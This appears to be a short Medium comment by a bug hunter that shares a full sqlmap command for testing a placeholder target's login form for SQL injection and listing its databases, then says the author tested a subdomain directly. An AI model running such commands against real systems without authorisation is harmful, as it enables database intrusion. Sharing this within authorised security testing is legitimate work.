Mr Empy
Feb 8, 2022

The complete command I used was:

./sqlmap.py -u 'https://subdomain.target.tld/index.php' --data='username=Admin&password=admin&Submit=Process+Login&user_login=user_login' --risk 3 --batch --dbs

I just found a subdomain and went straight to test SQL injection, which was impressive because normally I always look for a target's technologies before analyzing possible vulnerabilities and this time it was different lol. Thanks bro 😁

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Mr Empy
Mr Empy

Written by Mr Empy

「🎩」Pentester & Bug Hunter 「🌕」Ethical Hacker 「🇧🇷」Brazil 「⚡」17 y/o 「👾」CTF Player 「🤖」Programmer 「▶️」Youtuber

No responses yet

Write a response